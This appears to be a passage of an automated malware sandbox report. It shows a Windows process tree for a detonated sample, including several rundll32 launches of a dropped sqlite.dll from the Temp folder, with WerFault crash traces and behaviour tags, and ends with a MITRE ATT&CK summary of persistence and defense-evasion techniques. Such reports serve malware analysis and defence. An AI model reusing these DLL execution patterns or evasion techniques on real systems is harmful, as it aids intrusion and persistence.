- Suspicious use of AdjustPrivilegeToken
PID:5732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5824 -ip 58241⤵PID:6828
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5932 -ip 59321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5816 -ip 58161⤵PID:6748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 6820 -ip 68201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2432 -ip 24321⤵PID:5844
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5984 -ip 59841⤵PID:3472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 6788 -ip 67881⤵PID:3472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6852 -ip 68521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 3036 -ip 30361⤵PID:5164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1596 -ip 15961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 6892 -ip 68921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 6608 -ip 66081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 2536 -ip 25361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5760
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2200 -ip 22001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 6176 -ip 61761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5984 -ip 59841⤵PID:1616
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6580 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5952 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5952 -s 4203⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4584
-
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 460629855e209cd5b16a907274503a56 gT42+laoRUGWqQMp0E2DMg.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:1116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5952 -ip 59521⤵PID:3812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 7384 -ip 73841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3812
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 708 -p 7496 -ip 74961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5664
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 424 -p 1064 -ip 10641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 8924 -ip 89241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5608 -ip 56081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 9128 -ip 91281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3404 -ip 34041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 8036 -ip 80361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 6420 -ip 64201⤵PID:8396
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8600 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:400 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7380
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 400 -ip 4001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6744
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 2440 -ip 24401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:3036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 2312 -ip 23121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 9072 -ip 90721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6904
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7664 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:8884 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8884 -s 4563⤵
- Program crash
PID:3016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8884 -s 4563⤵
- Program crash
PID:5112
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 8884 -ip 88841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5464
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
- Modifies data under HKEY_USERS
PID:8812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 8516 -ip 85161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 8516 -ip 85161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:2044
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:7448
-
C:\Windows\system32\WerFault.exe"C:\Windows\system32\WerFault.exe" -k -lc WATCHDOG WATCHDOG-20211108-0823.dmp1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 8540 -ip 85401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 2156 -ip 21561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 6460 -ip 64601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3128
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
PID:7028 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 70BB7CD0850E1E41029D67F6D2651FCF C2⤵PID:4872
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:9200
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
3Registry Run Keys / Startup Folder
2Scheduled Task
1Winlogon Helper DLL
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
5Impair Defenses
1Install Root Certificate
1Modify Registry
10Virtualization/Sandbox Evasion
1Web Service
1